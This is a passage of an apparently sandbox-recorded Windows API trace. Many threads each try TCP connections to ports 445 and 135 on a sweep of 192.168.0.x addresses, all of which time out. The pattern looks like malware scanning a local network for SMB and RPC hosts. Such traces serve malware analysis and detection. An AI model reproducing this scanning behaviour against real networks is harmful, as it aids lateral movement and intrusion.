writefds=0x1477fd08, exceptfds=0x1477fe10) returned 0 [0102.180] closesocket (s=0x11d0) returned 0 [0102.181] RtlExitUserThread (Status=0x0) Thread: id = 271 os_tid = 0xe28 [0091.911] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072340 [0091.911] free (_Block=0x2072340) [0091.911] inet_addr (cp="192.168.0.42") returned 0x2a00a8c0 [0091.912] htons (hostshort=0x1bd) returned 0xbd01 [0091.912] socket (af=2, type=1, protocol=6) returned 0x11dc [0091.912] ioctlsocket (in: s=0x11dc, cmd=-2147195266, argp=0x148bff34 | out: argp=0x148bff34) returned 0 [0091.912] connect (s=0x11dc, name=0x148bff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.42"), namelen=16) returned -1 [0091.913] WSAGetLastError () returned 10035 [0091.913] select (in: nfds=0, readfds=0x0, writefds=0x148bfd08, exceptfds=0x148bfe10, timeout=0x148bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x148bfd08, exceptfds=0x148bfe10) returned 0 [0097.126] closesocket (s=0x11dc) returned 0 [0097.127] inet_addr (cp="192.168.0.42") returned 0x2a00a8c0 [0097.127] htons (hostshort=0x87) returned 0x8700 [0097.127] socket (af=2, type=1, protocol=6) returned 0x11dc [0097.127] ioctlsocket (in: s=0x11dc, cmd=-2147195266, argp=0x148bff34 | out: argp=0x148bff34) returned 0 [0097.127] connect (s=0x11dc, name=0x148bff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.42"), namelen=16) returned -1 [0097.127] WSAGetLastError () returned 10035 [0097.127] select (in: nfds=0, readfds=0x0, writefds=0x148bfd08, exceptfds=0x148bfe10, timeout=0x148bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x148bfd08, exceptfds=0x148bfe10) returned 0 [0102.178] closesocket (s=0x11dc) returned 0 [0102.179] RtlExitUserThread (Status=0x0) Thread: id = 272 os_tid = 0xe2c [0091.913] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072318 [0091.913] free (_Block=0x2072318) [0091.913] inet_addr (cp="192.168.0.41") returned 0x2900a8c0 [0091.913] htons (hostshort=0x1bd) returned 0xbd01 [0091.914] socket (af=2, type=1, protocol=6) returned 0x11e8 [0091.914] ioctlsocket (in: s=0x11e8, cmd=-2147195266, argp=0x149fff34 | out: argp=0x149fff34) returned 0 [0091.914] connect (s=0x11e8, name=0x149fff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.41"), namelen=16) returned -1 [0091.915] WSAGetLastError () returned 10035 [0091.915] select (in: nfds=0, readfds=0x0, writefds=0x149ffd08, exceptfds=0x149ffe10, timeout=0x149fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x149ffd08, exceptfds=0x149ffe10) returned 0 [0097.125] closesocket (s=0x11e8) returned 0 [0097.126] inet_addr (cp="192.168.0.41") returned 0x2900a8c0 [0097.126] htons (hostshort=0x87) returned 0x8700 [0097.126] socket (af=2, type=1, protocol=6) returned 0x11e8 [0097.126] ioctlsocket (in: s=0x11e8, cmd=-2147195266, argp=0x149fff34 | out: argp=0x149fff34) returned 0 [0097.126] connect (s=0x11e8, name=0x149fff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.41"), namelen=16) returned -1 [0097.126] WSAGetLastError () returned 10035 [0097.126] select (in: nfds=0, readfds=0x0, writefds=0x149ffd08, exceptfds=0x149ffe10, timeout=0x149fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x149ffd08, exceptfds=0x149ffe10) returned 0 [0102.177] closesocket (s=0x11e8) returned 0 [0102.177] RtlExitUserThread (Status=0x0) Thread: id = 273 os_tid = 0xe30 [0091.915] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20722f0 [0091.915] free (_Block=0x20722f0) [0091.915] inet_addr (cp="192.168.0.40") returned 0x2800a8c0 [0091.915] htons (hostshort=0x1bd) returned 0xbd01 [0091.915] socket (af=2, type=1, protocol=6) returned 0x11f4 [0091.916] ioctlsocket (in: s=0x11f4, cmd=-2147195266, argp=0x14b3ff34 | out: argp=0x14b3ff34) returned 0 [0091.916] connect (s=0x11f4, name=0x14b3ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.40"), namelen=16) returned -1 [0091.916] WSAGetLastError () returned 10035 [0091.916] select (in: nfds=0, readfds=0x0, writefds=0x14b3fd08, exceptfds=0x14b3fe10, timeout=0x14b3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x14b3fd08, exceptfds=0x14b3fe10) returned 0 [0097.124] closesocket (s=0x11f4) returned 0 [0097.124] inet_addr (cp="192.168.0.40") returned 0x2800a8c0 [0097.124] htons (hostshort=0x87) returned 0x8700 [0097.124] socket (af=2, type=1, protocol=6) returned 0x11f4 [0097.125] ioctlsocket (in: s=0x11f4, cmd=-2147195266, argp=0x14b3ff34 | out: argp=0x14b3ff34) returned 0 [0097.125] connect (s=0x11f4, name=0x14b3ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.40"), namelen=16) returned -1 [0097.125] WSAGetLastError () returned 10035 [0097.125] select (in: nfds=0, readfds=0x0, writefds=0x14b3fd08, exceptfds=0x14b3fe10, timeout=0x14b3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x14b3fd08, exceptfds=0x14b3fe10) returned 0 [0102.175] closesocket (s=0x11f4) returned 0 [0102.176] RtlExitUserThread (Status=0x0) Thread: id = 274 os_tid = 0xe34 [0091.917] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20722c8 [0091.917] free (_Block=0x20722c8) [0091.917] inet_addr (cp="192.168.0.39") returned 0x2700a8c0 [0091.917] htons (hostshort=0x1bd) returned 0xbd01 [0091.917] socket (af=2, type=1, protocol=6) returned 0x1200 [0091.917] ioctlsocket (in: s=0x1200, cmd=-2147195266, argp=0x14c7ff34 | out: argp=0x14c7ff34) returned 0 [0091.917] connect (s=0x1200, name=0x14c7ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.39"), namelen=16) returned -1 [0091.918] WSAGetLastError () returned 10035 [0091.918] select (in: nfds=0, readfds=0x0, writefds=0x14c7fd08, exceptfds=0x14c7fe10, timeout=0x14c7ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x14c7fd08, exceptfds=0x14c7fe10) returned 0 [0097.122] closesocket (s=0x1200) returned 0 [0097.123] inet_addr (cp="192.168.0.39") returned 0x2700a8c0 [0097.123] htons (hostshort=0x87) returned 0x8700 [0097.123] socket (af=2, type=1, protocol=6) returned 0x1200 [0097.123] ioctlsocket (in: s=0x1200, cmd=-2147195266, argp=0x14c7ff34 | out: argp=0x14c7ff34) returned 0 [0097.123] connect (s=0x1200, name=0x14c7ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.39"), namelen=16) returned -1 [0097.123] WSAGetLastError () returned 10035 [0097.124] select (in: nfds=0, readfds=0x0, writefds=0x14c7fd08, exceptfds=0x14c7fe10, timeout=0x14c7ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x14c7fd08, exceptfds=0x14c7fe10) returned 0 [0102.173] closesocket (s=0x1200) returned 0 [0102.174] RtlExitUserThread (Status=0x0) Thread: id = 275 os_tid = 0xe38 [0091.918] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20722a0 [0091.918] free (_Block=0x20722a0) [0091.918] inet_addr (cp="192.168.0.38") returned 0x2600a8c0 [0091.919] htons (hostshort=0x1bd) returned 0xbd01 [0091.919] socket (af=2, type=1, protocol=6) returned 0x120c [0091.919] ioctlsocket (in: s=0x120c, cmd=-2147195266, argp=0x14dbff34 | out: argp=0x14dbff34) returned 0 [0091.919] connect (s=0x120c, name=0x14dbff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.38"), namelen=16) returned -1 [0091.920] WSAGetLastError () returned 10035 [0091.920] select (in: nfds=0, readfds=0x0, writefds=0x14dbfd08, exceptfds=0x14dbfe10, timeout=0x14dbff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x14dbfd08, exceptfds=0x14dbfe10) returned 0 [0097.121] closesocket (s=0x120c) returned 0 [0097.122] inet_addr (cp="192.168.0.38") returned 0x2600a8c0 [0097.122] htons (hostshort=0x87) returned 0x8700 [0097.122] socket (af=2, type=1, protocol=6) returned 0x120c [0097.122] ioctlsocket (in: s=0x120c, cmd=-2147195266, argp=0x14dbff34 | out: argp=0x14dbff34) returned 0 [0097.122] connect (s=0x120c, name=0x14dbff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.38"), namelen=16) returned -1 [0097.122] WSAGetLastError () returned 10035 [0097.122] select (in: nfds=0, readfds=0x0, writefds=0x14dbfd08, exceptfds=0x14dbfe10, timeout=0x14dbff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x14dbfd08, exceptfds=0x14dbfe10) returned 0 [0102.172] closesocket (s=0x120c) returned 0 [0102.173] RtlExitUserThread (Status=0x0) Thread: id = 276 os_tid = 0xe3c [0091.920] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072278 [0091.920] free (_Block=0x2072278) [0091.920] inet_addr (cp="192.168.0.37") returned 0x2500a8c0 [0091.920] htons (hostshort=0x1bd) returned 0xbd01 [0091.920] socket (af=2, type=1, protocol=6) returned 0x1218 [0091.921] ioctlsocket (in: s=0x1218, cmd=-2147195266, argp=0x14efff34 | out: argp=0x14efff34) returned 0 [0091.921] connect (s=0x1218, name=0x14efff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.37"), namelen=16) returned -1 [0091.921] WSAGetLastError () returned 10035 [0091.921] select (in: nfds=0, readfds=0x0, writefds=0x14effd08, exceptfds=0x14effe10, timeout=0x14efff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x14effd08, exceptfds=0x14effe10) returned 0 [0097.139] closesocket (s=0x1218) returned 0 [0097.140] inet_addr (cp="192.168.0.37") returned 0x2500a8c0 [0097.140] htons (hostshort=0x87) returned 0x8700 [0097.140] socket (af=2, type=1, protocol=6) returned 0x1218 [0097.140] ioctlsocket (in: s=0x1218, cmd=-2147195266, argp=0x14efff34 | out: argp=0x14efff34) returned 0 [0097.140] connect (s=0x1218, name=0x14efff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.37"), namelen=16) returned -1 [0097.140] WSAGetLastError () returned 10035 [0097.140] select (in: nfds=0, readfds=0x0, writefds=0x14effd08, exceptfds=0x14effe10, timeout=0x14efff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x14effd08, exceptfds=0x14effe10) returned 0 [0102.205] closesocket (s=0x1218) returned 0 [0102.206] RtlExitUserThread (Status=0x0) Thread: id = 277 os_tid = 0xe40 [0091.922] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072250 [0091.922] free (_Block=0x2072250) [0091.922] inet_addr (cp="192.168.0.36") returned 0x2400a8c0 [0091.922] htons (hostshort=0x1bd) returned 0xbd01 [0091.922] socket (af=2, type=1, protocol=6) returned 0x1224 [0091.923] ioctlsocket (in: s=0x1224, cmd=-2147195266, argp=0x1503ff34 | out: argp=0x1503ff34) returned 0 [0091.923] connect (s=0x1224, name=0x1503ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.36"), namelen=16) returned -1 [0091.923] WSAGetLastError () returned 10035 [0091.923] select (in: nfds=0, readfds=0x0, writefds=0x1503fd08, exceptfds=0x1503fe10, timeout=0x1503ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1503fd08, exceptfds=0x1503fe10) returned 0 [0097.138] closesocket (s=0x1224) returned 0 [0097.138] inet_addr (cp="192.168.0.36") returned 0x2400a8c0 [0097.138] htons (hostshort=0x87) returned 0x8700 [0097.138] socket (af=2, type=1, protocol=6) returned 0x1224 [0097.139] ioctlsocket (in: s=0x1224, cmd=-2147195266, argp=0x1503ff34 | out: argp=0x1503ff34) returned 0 [0097.139] connect (s=0x1224, name=0x1503ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.36"), namelen=16) returned -1 [0097.139] WSAGetLastError () returned 10035 [0097.139] select (in: nfds=0, readfds=0x0, writefds=0x1503fd08, exceptfds=0x1503fe10, timeout=0x1503ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1503fd08, exceptfds=0x1503fe10) returned 0 [0102.207] closesocket (s=0x1224) returned 0 [0102.207] RtlExitUserThread (Status=0x0) Thread: id = 278 os_tid = 0xe44 [0091.924] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072228 [0091.924] free (_Block=0x2072228) [0091.924] inet_addr (cp="192.168.0.35") returned 0x2300a8c0 [0091.924] htons (hostshort=0x1bd) returned 0xbd01 [0091.924] socket (af=2, type=1, protocol=6) returned 0x1230 [0091.924] ioctlsocket (in: s=0x1230, cmd=-2147195266, argp=0x1517ff34 | out: argp=0x1517ff34) returned 0 [0091.924] connect (s=0x1230, name=0x1517ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.35"), namelen=16) returned -1 [0091.927] WSAGetLastError () returned 10035 [0091.927] select (in: nfds=0, readfds=0x0, writefds=0x1517fd08, exceptfds=0x1517fe10, timeout=0x1517ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1517fd08, exceptfds=0x1517fe10) returned 0 [0097.136] closesocket (s=0x1230) returned 0 [0097.137] inet_addr (cp="192.168.0.35") returned 0x2300a8c0 [0097.137] htons (hostshort=0x87) returned 0x8700 [0097.137] socket (af=2, type=1, protocol=6) returned 0x1230 [0097.137] ioctlsocket (in: s=0x1230, cmd=-2147195266, argp=0x1517ff34 | out: argp=0x1517ff34) returned 0 [0097.137] connect (s=0x1230, name=0x1517ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.35"), namelen=16) returned -1 [0097.138] WSAGetLastError () returned 10035 [0097.138] select (in: nfds=0, readfds=0x0, writefds=0x1517fd08, exceptfds=0x1517fe10, timeout=0x1517ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1517fd08, exceptfds=0x1517fe10) returned 0 [0102.208] closesocket (s=0x1230) returned 0 [0102.209] RtlExitUserThread (Status=0x0) Thread: id = 279 os_tid = 0xe48 [0091.927] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072200 [0091.928] free (_Block=0x2072200) [0091.928] inet_addr (cp="192.168.0.34") returned 0x2200a8c0 [0091.928] htons (hostshort=0x1bd) returned 0xbd01 [0091.928] socket (af=2, type=1, protocol=6) returned 0x123c [0091.928] ioctlsocket (in: s=0x123c, cmd=-2147195266, argp=0x152bff34 | out: argp=0x152bff34) returned 0 [0091.928] connect (s=0x123c, name=0x152bff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.34"), namelen=16) returned -1 [0091.929] WSAGetLastError () returned 10035 [0091.929] select (in: nfds=0, readfds=0x0, writefds=0x152bfd08, exceptfds=0x152bfe10, timeout=0x152bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x152bfd08, exceptfds=0x152bfe10) returned 0 [0097.135] closesocket (s=0x123c) returned 0 [0097.136] inet_addr (cp="192.168.0.34") returned 0x2200a8c0 [0097.136] htons (hostshort=0x87) returned 0x8700 [0097.136] socket (af=2, type=1, protocol=6) returned 0x123c [0097.136] ioctlsocket (in: s=0x123c, cmd=-2147195266, argp=0x152bff34 | out: argp=0x152bff34) returned 0 [0097.136] connect (s=0x123c, name=0x152bff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.34"), namelen=16) returned -1 [0097.136] WSAGetLastError () returned 10035 [0097.136] select (in: nfds=0, readfds=0x0, writefds=0x152bfd08, exceptfds=0x152bfe10, timeout=0x152bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x152bfd08, exceptfds=0x152bfe10) returned 0 [0102.210] closesocket (s=0x123c) returned 0 [0102.210] RtlExitUserThread (Status=0x0) Thread: id = 280 os_tid = 0xe4c [0091.930] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20721d8 [0091.930] free (_Block=0x20721d8) [0091.930] inet_addr (cp="192.168.0.33") returned 0x2100a8c0 [0091.930] htons (hostshort=0x1bd) returned 0xbd01 [0091.930] socket (af=2, type=1, protocol=6) returned 0x1248 [0091.930] ioctlsocket (in: s=0x1248, cmd=-2147195266, argp=0x153fff34 | out: argp=0x153fff34) returned 0 [0091.930] connect (s=0x1248, name=0x153fff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.33"), namelen=16) returned -1 [0091.931] WSAGetLastError () returned 10035 [0091.931] select (in: nfds=0, readfds=0x0, writefds=0x153ffd08, exceptfds=0x153ffe10, timeout=0x153fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x153ffd08, exceptfds=0x153ffe10) returned 0 [0097.134] closesocket (s=0x1248) returned 0 [0097.134] inet_addr (cp="192.168.0.33") returned 0x2100a8c0 [0097.134] htons (hostshort=0x87) returned 0x8700 [0097.134] socket (af=2, type=1, protocol=6) returned 0x1248 [0097.134] ioctlsocket (in: s=0x1248, cmd=-2147195266, argp=0x153fff34 | out: argp=0x153fff34) returned 0 [0097.134] connect (s=0x1248, name=0x153fff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.33"), namelen=16) returned -1 [0097.135] WSAGetLastError () returned 10035 [0097.135] select (in: nfds=0, readfds=0x0, writefds=0x153ffd08, exceptfds=0x153ffe10, timeout=0x153fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x153ffd08, exceptfds=0x153ffe10) returned 0 [0102.211] closesocket (s=0x1248) returned 0 [0102.212] RtlExitUserThread (Status=0x0) Thread: id = 281 os_tid = 0xe50 [0091.935] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20721b0 [0091.935] free (_Block=0x20721b0) [0091.935] inet_addr (cp="192.168.0.32") returned 0x2000a8c0 [0091.935] htons (hostshort=0x1bd) returned 0xbd01 [0091.935] socket (af=2, type=1, protocol=6) returned 0x1254 [0091.935] ioctlsocket (in: s=0x1254, cmd=-2147195266, argp=0x1553ff34 | out: argp=0x1553ff34) returned 0 [0091.935] connect (s=0x1254, name=0x1553ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.32"), namelen=16) returned -1 [0091.936] WSAGetLastError () returned 10035 [0091.936] select (in: nfds=0, readfds=0x0, writefds=0x1553fd08, exceptfds=0x1553fe10, timeout=0x1553ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1553fd08, exceptfds=0x1553fe10) returned 0 [0097.132] closesocket (s=0x1254) returned 0 [0097.133] inet_addr (cp="192.168.0.32") returned 0x2000a8c0 [0097.133] htons (hostshort=0x87) returned 0x8700 [0097.133] socket (af=2, type=1, protocol=6) returned 0x1254 [0097.133] ioctlsocket (in: s=0x1254, cmd=-2147195266, argp=0x1553ff34 | out: argp=0x1553ff34) returned 0 [0097.133] connect (s=0x1254, name=0x1553ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.32"), namelen=16) returned -1 [0097.133] WSAGetLastError () returned 10035 [0097.133] select (in: nfds=0, readfds=0x0, writefds=0x1553fd08, exceptfds=0x1553fe10, timeout=0x1553ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1553fd08, exceptfds=0x1553fe10) returned 0 [0102.212] closesocket (s=0x1254) returned 0 [0102.213] RtlExitUserThread (Status=0x0) Thread: id = 282 os_tid = 0xe54 [0091.936] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072188 [0091.936] free (_Block=0x2072188) [0091.936] inet_addr (cp="192.168.0.31") returned 0x1f00a8c0 [0091.936] htons (hostshort=0x1bd) returned 0xbd01 [0091.936] socket (af=2, type=1, protocol=6) returned 0x1260 [0091.940] ioctlsocket (in: s=0x1260, cmd=-2147195266, argp=0x1567ff34 | out: argp=0x1567ff34) returned 0 [0091.940] connect (s=0x1260, name=0x1567ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.31"), namelen=16) returned -1 [0091.941] WSAGetLastError () returned 10035 [0091.941] select (in: nfds=0, readfds=0x0, writefds=0x1567fd08, exceptfds=0x1567fe10, timeout=0x1567ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1567fd08, exceptfds=0x1567fe10) returned 0 [0097.147] closesocket (s=0x1260) returned 0 [0097.148] inet_addr (cp="192.168.0.31") returned 0x1f00a8c0 [0097.148] htons (hostshort=0x87) returned 0x8700 [0097.148] socket (af=2, type=1, protocol=6) returned 0x1260 [0097.148] ioctlsocket (in: s=0x1260, cmd=-2147195266, argp=0x1567ff34 | out: argp=0x1567ff34) returned 0 [0097.148] connect (s=0x1260, name=0x1567ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.31"), namelen=16) returned -1 [0097.148] WSAGetLastError () returned 10035 [0097.148] select (in: nfds=0, readfds=0x0, writefds=0x1567fd08, exceptfds=0x1567fe10, timeout=0x1567ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1567fd08, exceptfds=0x1567fe10) returned 0 [0102.230] closesocket (s=0x1260) returned 0 [0102.231] RtlExitUserThread (Status=0x0) Thread: id = 283 os_tid = 0xe58 [0091.941] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072160 [0091.941] free (_Block=0x2072160) [0091.941] inet_addr (cp="192.168.0.30") returned 0x1e00a8c0 [0091.941] htons (hostshort=0x1bd) returned 0xbd01 [0091.941] socket (af=2, type=1, protocol=6) returned 0x126c [0091.942] ioctlsocket (in: s=0x126c, cmd=-2147195266, argp=0x157bff34 | out: argp=0x157bff34) returned 0 [0091.942] connect (s=0x126c, name=0x157bff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.30"), namelen=16) returned -1 [0091.942] WSAGetLastError () returned 10035 [0091.942] select (in: nfds=0, readfds=0x0, writefds=0x157bfd08, exceptfds=0x157bfe10, timeout=0x157bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x157bfd08, exceptfds=0x157bfe10) returned 0 [0097.146] closesocket (s=0x126c) returned 0 [0097.146] inet_addr (cp="192.168.0.30") returned 0x1e00a8c0 [0097.146] htons (hostshort=0x87) returned 0x8700 [0097.146] socket (af=2, type=1, protocol=6) returned 0x126c [0097.147] ioctlsocket (in: s=0x126c, cmd=-2147195266, argp=0x157bff34 | out: argp=0x157bff34) returned 0 [0097.147] connect (s=0x126c, name=0x157bff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.30"), namelen=16) returned -1 [0097.147] WSAGetLastError () returned 10035 [0097.147] select (in: nfds=0, readfds=0x0, writefds=0x157bfd08, exceptfds=0x157bfe10, timeout=0x157bff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x157bfd08, exceptfds=0x157bfe10) returned 0 [0102.194] closesocket (s=0x126c) returned 0 [0102.195] RtlExitUserThread (Status=0x0) Thread: id = 284 os_tid = 0xe5c [0091.943] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072138 [0091.943] free (_Block=0x2072138) [0091.943] inet_addr (cp="192.168.0.29") returned 0x1d00a8c0 [0091.943] htons (hostshort=0x1bd) returned 0xbd01 [0091.943] socket (af=2, type=1, protocol=6) returned 0x1278 [0091.943] ioctlsocket (in: s=0x1278, cmd=-2147195266, argp=0x158fff34 | out: argp=0x158fff34) returned 0 [0091.943] connect (s=0x1278, name=0x158fff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.29"), namelen=16) returned -1 [0091.944] WSAGetLastError () returned 10035 [0091.944] select (in: nfds=0, readfds=0x0, writefds=0x158ffd08, exceptfds=0x158ffe10, timeout=0x158fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x158ffd08, exceptfds=0x158ffe10) returned 0 [0097.144] closesocket (s=0x1278) returned 0 [0097.145] inet_addr (cp="192.168.0.29") returned 0x1d00a8c0 [0097.145] htons (hostshort=0x87) returned 0x8700 [0097.145] socket (af=2, type=1, protocol=6) returned 0x1278 [0097.145] ioctlsocket (in: s=0x1278, cmd=-2147195266, argp=0x158fff34 | out: argp=0x158fff34) returned 0 [0097.145] connect (s=0x1278, name=0x158fff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.29"), namelen=16) returned -1 [0097.146] WSAGetLastError () returned 10035 [0097.146] select (in: nfds=0, readfds=0x0, writefds=0x158ffd08, exceptfds=0x158ffe10, timeout=0x158fff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x158ffd08, exceptfds=0x158ffe10) returned 0 [0102.196] closesocket (s=0x1278) returned 0 [0102.196] RtlExitUserThread (Status=0x0) Thread: id = 285 os_tid = 0xe60 [0091.944] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072110 [0091.944] free (_Block=0x2072110) [0091.945] inet_addr (cp="192.168.0.28") returned 0x1c00a8c0 [0091.945] htons (hostshort=0x1bd) returned 0xbd01 [0091.945] socket (af=2, type=1, protocol=6) returned 0x1284 [0091.945] ioctlsocket (in: s=0x1284, cmd=-2147195266, argp=0x15a3ff34 | out: argp=0x15a3ff34) returned 0 [0091.945] connect (s=0x1284, name=0x15a3ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.28"), namelen=16) returned -1 [0091.946] WSAGetLastError () returned 10035 [0091.946] select (in: nfds=0, readfds=0x0, writefds=0x15a3fd08, exceptfds=0x15a3fe10, timeout=0x15a3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15a3fd08, exceptfds=0x15a3fe10) returned 0 [0097.143] closesocket (s=0x1284) returned 0 [0097.144] inet_addr (cp="192.168.0.28") returned 0x1c00a8c0 [0097.144] htons (hostshort=0x87) returned 0x8700 [0097.144] socket (af=2, type=1, protocol=6) returned 0x1284 [0097.144] ioctlsocket (in: s=0x1284, cmd=-2147195266, argp=0x15a3ff34 | out: argp=0x15a3ff34) returned 0 [0097.144] connect (s=0x1284, name=0x15a3ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.28"), namelen=16) returned -1 [0097.144] WSAGetLastError () returned 10035 [0097.144] select (in: nfds=0, readfds=0x0, writefds=0x15a3fd08, exceptfds=0x15a3fe10, timeout=0x15a3ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15a3fd08, exceptfds=0x15a3fe10) returned 0 [0102.197] closesocket (s=0x1284) returned 0 [0102.198] RtlExitUserThread (Status=0x0) Thread: id = 286 os_tid = 0xe64 [0091.946] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20720e8 [0091.946] free (_Block=0x20720e8) [0091.946] inet_addr (cp="192.168.0.27") returned 0x1b00a8c0 [0091.946] htons (hostshort=0x1bd) returned 0xbd01 [0091.946] socket (af=2, type=1, protocol=6) returned 0x1290 [0091.948] ioctlsocket (in: s=0x1290, cmd=-2147195266, argp=0x15b7ff34 | out: argp=0x15b7ff34) returned 0 [0091.949] connect (s=0x1290, name=0x15b7ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.27"), namelen=16) returned -1 [0091.949] WSAGetLastError () returned 10035 [0091.949] select (in: nfds=0, readfds=0x0, writefds=0x15b7fd08, exceptfds=0x15b7fe10, timeout=0x15b7ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15b7fd08, exceptfds=0x15b7fe10) returned 0 [0097.142] closesocket (s=0x1290) returned 0 [0097.142] inet_addr (cp="192.168.0.27") returned 0x1b00a8c0 [0097.142] htons (hostshort=0x87) returned 0x8700 [0097.142] socket (af=2, type=1, protocol=6) returned 0x1290 [0097.143] ioctlsocket (in: s=0x1290, cmd=-2147195266, argp=0x15b7ff34 | out: argp=0x15b7ff34) returned 0 [0097.143] connect (s=0x1290, name=0x15b7ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.27"), namelen=16) returned -1 [0097.143] WSAGetLastError () returned 10035 [0097.143] select (in: nfds=0, readfds=0x0, writefds=0x15b7fd08, exceptfds=0x15b7fe10, timeout=0x15b7ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x15b7fd08, exceptfds=0x15b7fe10) returned 0 [0102.199] closesocket (s=0x1290) returned 0 [0102.200] RtlExitUserThread (Status=0x0) Thread: id = 287 os_tid = 0xe68 [0091.950] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20720c0 [0091.950] free (_Block=0x20720c0) [0091.950] inet_addr (cp="192.168.0.26") returned 0x1a00a8c0 [0091.950] htons (hostshort=0x1bd) returned 0xbd01 [0091.950] socket (af=2, type=1, protocol=6) returned 0x129c [0091.950] ioctlsocket (in: s=0x129c, cmd=-2147195266, argp=0x15cbff34 | out: argp=0x15cbff34) returned 0 [0091.950] connect (s=0x129c, 